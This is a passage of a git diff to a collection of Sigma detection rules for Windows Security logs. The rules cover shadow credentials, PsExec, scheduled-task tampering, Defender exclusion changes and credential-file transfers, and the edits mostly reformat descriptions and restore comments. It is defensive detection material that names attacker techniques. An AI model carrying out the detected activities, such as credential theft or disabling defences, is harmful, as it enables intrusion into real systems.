(Nextron Systems) @@ -19,7 +18,7 @@ detection: selection: EventID: 5379 TargetName|contains: Microsoft_Windows_Shell_ZipFolder:filename - filter: + filter: # avoid overlaps with 54f0434b-726f-48a1-b2aa-067df14516e4 TargetName|contains: \Temporary Internet Files\Content.Outlook condition: security and (selection and not filter) falsepositives: diff --git a/sigma/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml b/sigma/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml index ad625815c..9047fbfcc 100644 --- a/sigma/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml +++ b/sigma/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml @@ -1,9 +1,7 @@ title: Password Protected ZIP File Opened (Suspicious Filenames) id: 54f0434b-726f-48a1-b2aa-067df14516e4 status: test -description: Detects the extraction of password protected ZIP archives with suspicious - file names. See the filename variable for more details on which file has been - opened. +description: Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened. references: - https://twitter.com/sbousseaden/status/1523383197513379841 author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml b/sigma/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml index a7d047ecd..6b598f552 100644 --- a/sigma/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml +++ b/sigma/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml @@ -1,8 +1,7 @@ title: Password Protected ZIP File Opened (Email Attachment) id: 571498c8-908e-40b4-910b-d2369159a3da status: test -description: Detects the extraction of password protected ZIP archives. See the filename - variable for more details on which file has been opened. +description: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened. references: - https://twitter.com/sbousseaden/status/1523383197513379841 author: Florian Roth (Nextron Systems) diff --git a/sigma/builtin/security/win_security_susp_outbound_kerberos_connection.yml b/sigma/builtin/security/win_security_susp_outbound_kerberos_connection.yml index a435109b2..d1be028ec 100644 --- a/sigma/builtin/security/win_security_susp_outbound_kerberos_connection.yml +++ b/sigma/builtin/security/win_security_susp_outbound_kerberos_connection.yml @@ -1,11 +1,10 @@ title: Suspicious Outbound Kerberos Connection - Security id: eca91c7c-9214-47b9-b4c5-cb1d7e4f2350 related: - - id: e54979bd-c5f9-4d6c-967b-a04b19ac4c74 - type: similar + - id: e54979bd-c5f9-4d6c-967b-a04b19ac4c74 + type: similar status: test -description: Detects suspicious outbound network activity via kerberos default port - indicating possible lateral movement or first stage PrivEsc via delegation. +description: Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation. references: - https://github.com/GhostPack/Rubeus author: Ilyas Ochkov, oscd.community @@ -30,6 +29,10 @@ detection: - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe - C:\Program Files\Mozilla Firefox\firefox.exe - C:\Program Files (x86)\Mozilla Firefox\firefox.exe + # filter_browsers: + # Application|endswith: + # - '\opera.exe' + # - '\tomcat\bin\tomcat8.exe' condition: security and (selection and not 1 of filter_*) falsepositives: - Web Browsers diff --git a/sigma/builtin/security/win_security_susp_possible_shadow_credentials_added.yml b/sigma/builtin/security/win_security_susp_possible_shadow_credentials_added.yml index 6e34e1eb1..4a7a53703 100644 --- a/sigma/builtin/security/win_security_susp_possible_shadow_credentials_added.yml +++ b/sigma/builtin/security/win_security_susp_possible_shadow_credentials_added.yml @@ -1,8 +1,7 @@ title: Possible Shadow Credentials Added id: f598ea0c-c25a-4f72-a219-50c44411c791 status: test -description: Detects possible addition of shadow credentials to an active directory - object. +description: Detects possible addition of shadow credentials to an active directory object. references: - https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html - https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/ @@ -15,24 +14,24 @@ tags: logsource: product: windows service: security - definition: The "Audit Directory Service Changes" logging policy must be configured - in order to receive events. Audit events are generated only for objects with - configured system access control lists (SACLs). Audit events are generated - only for objects with configured system access control lists (SACLs) and only - when accessed in a manner that matches their SACL settings. This policy covers - the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default - policy does not cover User objects. For that a custom AuditRule need to be - setup (See https://github.com/OTRF/Set-AuditRule) + definition: The "Audit Directory Service Changes" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs). Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule need to be setup (See https://github.com/OTRF/Set-AuditRule) detection: security: Channel: Security selection: EventID: 5136 AttributeLDAPDisplayName: msDS-KeyCredentialLink + # If you experience a lot of FP you could uncomment the selection below + # There could be other cases for other tooling add them accordingly + # AttributeValue|contains: 'B:828' + # OperationType: '%%14674' # Value Added + # As stated in the FP sections it's better to filter out the expected accounts that perform this operation to tighten the logic + # Uncomment the filter below and add the account name (or any other specific field) accordingly + # Don't forget to add it to the condition section below + # filter: + # SubjectUserName: "%name%" condition: security and selection falsepositives: - - Modifications in the msDS-KeyCredentialLink attribute can be done legitimately - by the Azure AD Connect synchronization account or the ADFS service account. - These accounts can be added as Exceptions. (From elastic FP section) + - Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section) level: high ruletype: Sigma diff --git a/sigma/builtin/security/win_security_susp_psexec.yml b/sigma/builtin/security/win_security_susp_psexec.yml index 38c3ee215..2460d626f 100644 --- a/sigma/builtin/security/win_security_susp_psexec.yml +++ b/sigma/builtin/security/win_security_susp_psexec.yml @@ -1,9 +1,7 @@ title: Suspicious PsExec Execution id: c462f537-a1e3-41a6-b5fc-b2c2cef9bf82 status: test -description: detects execution of psexec or paexec with renamed service name, this - rule helps to filter out the noise if psexec is used for legit purposes or if - attacker uses a different psexec client other than sysinternal one +description: detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one references: - https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html author: Samir Bousseaden @@ -15,14 +13,13 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit Detailed - File Share" must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure detection: security: Channel: Security selection1: EventID: 5145 - ShareName: \\\\\*\\IPC$ + ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$ RelativeTargetName|endswith: - -stdin - -stdout diff --git a/sigma/builtin/security/win_security_susp_raccess_sensitive_fext.yml b/sigma/builtin/security/win_security_susp_raccess_sensitive_fext.yml index f7ffadb55..14a882369 100644 --- a/sigma/builtin/security/win_security_susp_raccess_sensitive_fext.yml +++ b/sigma/builtin/security/win_security_susp_raccess_sensitive_fext.yml @@ -1,8 +1,8 @@ title: Suspicious Access to Sensitive File Extensions id: 91c945bc-2ad1-4799-a591-4d00198a1215 related: - - id: 286b47ed-f6fe-40b3-b3a8-35129acd43bc - type: similar + - id: 286b47ed-f6fe-40b3-b3a8-35129acd43bc + type: similar status: test description: Detects known sensitive file extensions accessed on a network share author: Samir Bousseaden diff --git a/sigma/builtin/security/win_security_susp_scheduled_task_creation.yml b/sigma/builtin/security/win_security_susp_scheduled_task_creation.yml index aa5ab8b70..3caf1ae7b 100644 --- a/sigma/builtin/security/win_security_susp_scheduled_task_creation.yml +++ b/sigma/builtin/security/win_security_susp_scheduled_task_creation.yml @@ -1,8 +1,7 @@ title: Suspicious Scheduled Task Creation id: 3a734d25-df5c-4b99-8034-af1ddb5883a4 status: test -description: Detects suspicious scheduled task creation events. Based on attributes - such as paths, commands line flags, etc. +description: Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc. references: - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698 author: Nasreddine Bencherchali (Nextron Systems) @@ -16,9 +15,7 @@ tags: logsource: product: windows service: security - definition: The Advanced Audit Policy setting Object Access > Audit Other Object - Access Events has to be configured to allow this detection. We also recommend - extracting the Command field from the embedded XML in the event data. + definition: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data. detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml b/sigma/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml index 475340f35..c2c71b8f3 100644 --- a/sigma/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml +++ b/sigma/builtin/security/win_security_susp_scheduled_task_delete_or_disable.yml @@ -1,15 +1,14 @@ title: Important Scheduled Task Deleted/Disabled id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad related: - - id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 - type: similar - - id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980 - type: similar - - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d - type: similar + - id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 # ProcCreation schtasks delete + type: similar + - id: 9ac94dc8-9042-493c-ba45-3b5e7c86b980 # ProcCreation schtasks disable + type: similar + - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d # TaskScheduler EventLog + type: similar status: experimental -description: Detects when adversaries stop services or processes by deleting or disabling - their respective scheduled tasks in order to conduct data destructive activities +description: Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities references: - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699 - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701 @@ -24,17 +23,16 @@ tags: logsource: product: windows service: security - definition: The Advanced Audit Policy setting Object Access > Audit Other Object - Access Events has to be configured to allow this detection. We also recommend - extracting the Command field from the embedded XML in the event data. + definition: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data. detection: security: Channel: Security selection: EventID: - - 4699 - - 4701 + - 4699 # Task Deleted Event + - 4701 # Task Disabled Event TaskName|contains: + # Add more important tasks - \Windows\SystemRestore\SR - \Windows\Windows Defender\ - \Windows\BitLocker @@ -44,7 +42,7 @@ detection: - \Windows\ExploitGuard filter_sys_username: EventID: 4699 - SubjectUserName|endswith: $ + SubjectUserName|endswith: $ # False positives during upgrades of Defender, where its tasks get removed and added TaskName|contains: \Windows\Windows Defender\ condition: security and (selection and not 1 of filter_*) falsepositives: diff --git a/sigma/builtin/security/win_security_susp_scheduled_task_update.yml b/sigma/builtin/security/win_security_susp_scheduled_task_update.yml index 700fbea63..7f9c5e1ac 100644 --- a/sigma/builtin/security/win_security_susp_scheduled_task_update.yml +++ b/sigma/builtin/security/win_security_susp_scheduled_task_update.yml @@ -1,8 +1,8 @@ title: Suspicious Scheduled Task Update id: 614cf376-6651-47c4-9dcc-6b9527f749f4 related: - - id: 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b - type: similar + - id: 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b # ProcCreation schtasks change + type: similar status: test description: Detects update to a scheduled task event that contain suspicious keywords. references: @@ -17,9 +17,7 @@ tags: logsource: product: windows service: security - definition: The Advanced Audit Policy setting Object Access > Audit Other Object - Access Events has to be configured to allow this detection. We also recommend - extracting the Command field from the embedded XML in the event data. + definition: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection. We also recommend extracting the Command field from the embedded XML in the event data. detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_susp_time_modification.yml b/sigma/builtin/security/win_security_susp_time_modification.yml index 3b9a3b3c1..1f4bd35c5 100644 --- a/sigma/builtin/security/win_security_susp_time_modification.yml +++ b/sigma/builtin/security/win_security_susp_time_modification.yml @@ -1,8 +1,7 @@ title: Unauthorized System Time Modification id: faa031b5-21ed-4e02-8881-2591f98d82ed status: test -description: Detect scenarios where a potentially unauthorized application or user - is modifying the system time. +description: Detect scenarios where a potentially unauthorized application or user is modifying the system time. references: - Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well) - Live environment caused by malware @@ -16,9 +15,7 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Policy : System > Audit Security State Change, - Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced - Audit Policy Configuration\Audit Policies\System\Audit Security State Change' + definition: 'Requirements: Audit Policy : System > Audit Security State Change, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\System\Audit Security State Change' detection: security: Channel: Security @@ -34,7 +31,6 @@ detection: SubjectUserSid: S-1-5-19 condition: security and (selection and not 1 of filter*) falsepositives: - - HyperV or other virtualization technologies with binary not listed in filter - portion of detection + - HyperV or other virtualization technologies with binary not listed in filter portion of detection level: low ruletype: Sigma diff --git a/sigma/builtin/security/win_security_svcctl_remote_service.yml b/sigma/builtin/security/win_security_svcctl_remote_service.yml index 97ccb5daf..fb94eb1e3 100644 --- a/sigma/builtin/security/win_security_svcctl_remote_service.yml +++ b/sigma/builtin/security/win_security_svcctl_remote_service.yml @@ -1,8 +1,7 @@ title: Remote Service Activity via SVCCTL Named Pipe id: 586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3 status: test -description: Detects remote service activity via remote access to the svcctl named - pipe +description: Detects remote service activity via remote access to the svcctl named pipe references: - https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html author: Samir Bousseaden @@ -15,14 +14,13 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit Detailed - File Share" must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure detection: security: Channel: Security selection: EventID: 5145 - ShareName: \\\\\*\\IPC$ + ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$ RelativeTargetName: svcctl Accesses|contains: WriteData condition: security and selection diff --git a/sigma/builtin/security/win_security_syskey_registry_access.yml b/sigma/builtin/security/win_security_syskey_registry_access.yml index 4a5b1eb7b..da7f1f56d 100644 --- a/sigma/builtin/security/win_security_syskey_registry_access.yml +++ b/sigma/builtin/security/win_security_syskey_registry_access.yml @@ -1,8 +1,7 @@ title: SysKey Registry Keys Access id: 9a4ff3b8-6187-4fd2-8e8b-e0eae1129495 status: test -description: Detects handle requests and access operations to specific registry keys - to calculate the SysKey +description: Detects handle requests and access operations to specific registry keys to calculate the SysKey references: - https://threathunterplaybook.com/hunts/windows/190625-RegKeyAccessSyskey/notebook.html author: Roberto Rodriguez @Cyb3rWard0g diff --git a/sigma/builtin/security/win_security_sysmon_channel_reference_deletion.yml b/sigma/builtin/security/win_security_sysmon_channel_reference_deletion.yml index 0484ca647..e96e1f6f2 100644 --- a/sigma/builtin/security/win_security_sysmon_channel_reference_deletion.yml +++ b/sigma/builtin/security/win_security_sysmon_channel_reference_deletion.yml @@ -1,8 +1,7 @@ title: Sysmon Channel Reference Deletion id: 18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc status: test -description: Potential threat actor tampering with Sysmon manifest and eventually - disabling it +description: Potential threat actor tampering with Sysmon manifest and eventually disabling it references: - https://twitter.com/Flangvik/status/1283054508084473861 - https://twitter.com/SecurityJosh/status/1283027365770276866 @@ -32,7 +31,7 @@ detection: ObjectName|contains: - WINEVT\Publishers\{5770385f-c22a-43e0-bf4c-06f5698ffbd9} - WINEVT\Channels\Microsoft-Windows-Sysmon/Operational - AccessMask: 65536 + AccessMask: 0x10000 condition: security and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/security/win_security_tap_driver_installation.yml b/sigma/builtin/security/win_security_tap_driver_installation.yml index abbd5d184..5401be925 100644 --- a/sigma/builtin/security/win_security_tap_driver_installation.yml +++ b/sigma/builtin/security/win_security_tap_driver_installation.yml @@ -1,11 +1,10 @@ title: Tap Driver Installation - Security id: 9c8afa4d-0022-48f0-9456-3712466f9701 related: - - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 - type: derived + - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9 + type: derived status: test -description: Well-known TAP software installation. Possible preparation for data exfiltration - using tunnelling techniques +description: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques author: Daniil Yugoslavskiy, Ian Davis, oscd.community date: 2019/10/24 modified: 2022/11/29 @@ -15,8 +14,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_teams_suspicious_objectaccess.yml b/sigma/builtin/security/win_security_teams_suspicious_objectaccess.yml index 0f6515ab7..248c58bb6 100644 --- a/sigma/builtin/security/win_security_teams_suspicious_objectaccess.yml +++ b/sigma/builtin/security/win_security_teams_suspicious_objectaccess.yml @@ -1,8 +1,7 @@ title: Suspicious Teams Application Related ObjectAcess Event id: 25cde13e-8e20-4c29-b949-4e795b76f16f status: test -description: Detects an access to authentication tokens and accounts of Microsoft - Teams desktop application. +description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. references: - https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/ - https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens diff --git a/sigma/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml b/sigma/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml index 264ba226b..33a4658f6 100644 --- a/sigma/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml +++ b/sigma/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml @@ -1,11 +1,10 @@ title: Transferring Files with Credential Data via Network Shares id: 910ab938-668b-401b-b08c-b596e80fdca5 related: - - id: 2e69f167-47b5-4ae7-a390-47764529eff5 - type: similar + - id: 2e69f167-47b5-4ae7-a390-47764529eff5 + type: similar status: test -description: Transferring files with well-known filenames (sensitive files with credential - data) using network shares +description: Transferring files with well-known filenames (sensitive files with credential data) using network shares references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment author: Teymur Kheirkhabarov, oscd.community @@ -35,7 +34,6 @@ detection: - \security condition: security and selection falsepositives: - - Transferring sensitive files for legitimate administration work by legitimate - administrator + - Transferring sensitive files for legitimate administration work by legitimate administrator level: medium ruletype: Sigma diff --git a/sigma/builtin/security/win_security_user_added_to_local_administrators.yml b/sigma/builtin/security/win_security_user_added_to_local_administrators.yml index 5b56a2d84..dc025bf74 100644 --- a/sigma/builtin/security/win_security_user_added_to_local_administrators.yml +++ b/sigma/builtin/security/win_security_user_added_to_local_administrators.yml @@ -1,8 +1,7 @@ title: User Added to Local Administrators id: c265cf08-3f99-46c1-8d59-328247057d57 status: stable -description: This rule triggers on user accounts that are added to the local Administrators - group, which could be legitimate activity or a sign of privilege escalation activity +description: This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity author: Florian Roth (Nextron Systems) date: 2017/03/14 modified: 2021/01/17 diff --git a/sigma/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml b/sigma/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml index dd010e500..df6b6789e 100644 --- a/sigma/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml +++ b/sigma/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml @@ -1,9 +1,7 @@ title: User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess' id: 6daac7fc-77d1-449a-a71a-e6b4d59a0e54 status: test -description: The 'LsaRegisterLogonProcess' function verifies that the application - making the function call is a logon process by checking that it has the SeTcbPrivilege - privilege set. Possible Rubeus tries to get a handle to LSA. +description: The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA. references: - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1 author: Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community @@ -22,7 +20,7 @@ detection: selection: EventID: 4673 Service: LsaRegisterLogonProcess() - Keywords: '0x8010000000000000' + Keywords: '0x8010000000000000' # failure condition: security and selection falsepositives: - Unknown diff --git a/sigma/builtin/security/win_security_user_creation.yml b/sigma/builtin/security/win_security_user_creation.yml index c7b5bcd08..dbda452cb 100644 --- a/sigma/builtin/security/win_security_user_creation.yml +++ b/sigma/builtin/security/win_security_user_creation.yml @@ -1,9 +1,7 @@ title: Local User Creation id: 66b6be3d-55d0-4f47-9855-d69df21740ea status: test -description: Detects local user creation on Windows servers, which shouldn't happen - in an Active Directory environment. Apply this Sigma Use Case on your Windows - server logs and not on your DC logs. +description: Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs. references: - https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/ author: Patrick Bareiss diff --git a/sigma/builtin/security/win_security_user_driver_loaded.yml b/sigma/builtin/security/win_security_user_driver_loaded.yml index 0badb4aa7..b8247892f 100644 --- a/sigma/builtin/security/win_security_user_driver_loaded.yml +++ b/sigma/builtin/security/win_security_user_driver_loaded.yml @@ -1,22 +1,12 @@ title: Potential Privileged System Service Operation - SeLoadDriverPrivilege id: f63508a0-c809-4435-b3be-ed819394d612 status: test -description: 'Detects the usage of the ''SeLoadDriverPrivilege'' privilege. This privilege - is required to load or unload a device driver. - - With this privilege, the user can dynamically load and unload device drivers or - other code in to kernel mode. - +description: | + Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver. + With this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode. This user right does not apply to Plug and Play device drivers. - - If you exclude privileged users/admins and processes, which are allowed to do - so, you are maybe left with bad programs trying to load malicious kernel drivers. - - This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) - and the usage of Sysinternals and various other tools. So you have to work with - a whitelist to find the bad stuff. - - ' + If you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers. + This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff. references: - https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673 @@ -60,9 +50,6 @@ detection: ProcessName|startswith: C:\Program Files\WindowsApps\Microsoft condition: security and (selection_1 and not 1 of filter_*) falsepositives: - - Other legimate tools loading drivers. Including but not limited to, Sysinternals, - CPU-Z, AVs etc. A baseline needs to be created according to the used products - and allowed tools. A good thing to do is to try and exclude users who are - allowed to load drivers. + - Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers. level: medium ruletype: Sigma diff --git a/sigma/builtin/security/win_security_user_logoff.yml b/sigma/builtin/security/win_security_user_logoff.yml index fb266b7b0..7bda9c96f 100644 --- a/sigma/builtin/security/win_security_user_logoff.yml +++ b/sigma/builtin/security/win_security_user_logoff.yml @@ -1,8 +1,7 @@ title: User Logoff Event id: 0badd08f-c6a3-4630-90d3-6875cca440be status: test -description: Detects a user log-off activity. Could be used for example to correlate - information during forensic investigations +description: Detects a user log-off activity. Could be used for example to correlate information during forensic investigations references: - https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634 diff --git a/sigma/builtin/security/win_security_vssaudit_secevent_source_registration.yml b/sigma/builtin/security/win_security_vssaudit_secevent_source_registration.yml index eaa288d4f..41280b53b 100644 --- a/sigma/builtin/security/win_security_vssaudit_secevent_source_registration.yml +++ b/sigma/builtin/security/win_security_vssaudit_secevent_source_registration.yml @@ -1,8 +1,7 @@ title: VSSAudit Security Event Source Registration id: e9faba72-4974-4ab2-a4c5-46e25ad59e9b status: test -description: Detects the registration of the security event source VSSAudit. It would - usually trigger when volume shadow copy operations happen. +description: Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR) @@ -24,7 +23,6 @@ detection: - 4905 condition: security and selection falsepositives: - - Legitimate use of VSSVC. Maybe backup operations. It would usually be done by - C:\Windows\System32\VSSVC.exe. + - Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\Windows\System32\VSSVC.exe. level: informational ruletype: Sigma diff --git a/sigma/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml b/sigma/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml index ecd5dd183..ed286a643 100644 --- a/sigma/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml +++ b/sigma/builtin/security/win_security_windows_defender_exclusions_registry_modified.yml @@ -1,16 +1,13 @@ title: Windows Defender Exclusion List Modified id: 46a68649-f218-4f86-aea1-16a759d81820 related: - - id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d - type: derived - - id: a33f8808-2812-4373-ae95-8cfb82134978 - type: derived + - id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d + type: derived + - id: a33f8808-2812-4373-ae95-8cfb82134978 + type: derived status: test -description: 'Detects modifications to the Windows Defender exclusion registry key. - This could indicate a potentially suspicious or even malicious activity by an - attacker trying to add a new exclusion in order to bypass security. - - ' +description: | + Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security. references: - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ author: '@BarryShooshooga' @@ -22,13 +19,12 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit - Policy, Registry System Access Control (SACL): Auditing/User' + definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit Policy, Registry System Access Control (SACL): Auditing/User' detection: security: Channel: Security selection: - EventID: 4657 + EventID: 4657 # A registry value was modified. ObjectName|contains: \Microsoft\Windows Defender\Exclusions\ condition: security and selection falsepositives: diff --git a/sigma/builtin/security/win_security_windows_defender_exclusions_write_access.yml b/sigma/builtin/security/win_security_windows_defender_exclusions_write_access.yml index d93e39ab2..eb2c78fca 100644 --- a/sigma/builtin/security/win_security_windows_defender_exclusions_write_access.yml +++ b/sigma/builtin/security/win_security_windows_defender_exclusions_write_access.yml @@ -1,16 +1,13 @@ title: Windows Defender Exclusion Reigstry Key - Write Access Requested id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d related: - - id: 46a68649-f218-4f86-aea1-16a759d81820 - type: derived - - id: a33f8808-2812-4373-ae95-8cfb82134978 - type: derived + - id: 46a68649-f218-4f86-aea1-16a759d81820 + type: derived + - id: a33f8808-2812-4373-ae95-8cfb82134978 + type: derived status: test -description: 'Detects write access requests to the Windows Defender exclusions registry - keys. This could be an indication of an attacker trying to request a handle or - access the object to write new exclusions in order to bypass security. - - ' +description: | + Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security. references: - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ author: '@BarryShooshooga, Nasreddine Bencherchali (Nextron Systems)' @@ -22,18 +19,17 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit - Policy, Registry System Access Control (SACL): Auditing/User' + definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit Policy, Registry System Access Control (SACL): Auditing/User' detection: security: Channel: Security selection: AccessList|contains: - - '%%4417' - - '%%4418' + - '%%4417' # WriteData + - '%%4418' # AppendData EventID: - - 4656 - - 4663 + - 4656 # A handle to an object was requested. + - 4663 # An attempt was made to access an object. ObjectName|contains: \Microsoft\Windows Defender\Exclusions\ condition: security and selection falsepositives: diff --git a/sigma/builtin/security/win_security_windows_defender_exclusions_write_deleted.yml b/sigma/builtin/security/win_security_windows_defender_exclusions_write_deleted.yml index 3a736c5c6..53d33b438 100644 --- a/sigma/builtin/security/win_security_windows_defender_exclusions_write_deleted.yml +++ b/sigma/builtin/security/win_security_windows_defender_exclusions_write_deleted.yml @@ -1,15 +1,13 @@ title: Windows Defender Exclusion Deleted id: a33f8808-2812-4373-ae95-8cfb82134978 related: - - id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d - type: derived - - id: 46a68649-f218-4f86-aea1-16a759d81820 - type: derived + - id: e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d + type: derived + - id: 46a68649-f218-4f86-aea1-16a759d81820 + type: derived status: test -description: 'Detects when a Windows Defender exclusion has been deleted. This could - indicate an attacker trying to delete their tracks by removing the added exclusions - - ' +description: | + Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to delete their tracks by removing the added exclusions references: - https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/ author: '@BarryShooshooga' @@ -21,13 +19,12 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit - Policy, Registry System Access Control (SACL): Auditing/User' + definition: 'Requirements: Audit Policy : Security Settings/Local Policies/Audit Policy, Registry System Access Control (SACL): Auditing/User' detection: security: Channel: Security selection: - EventID: 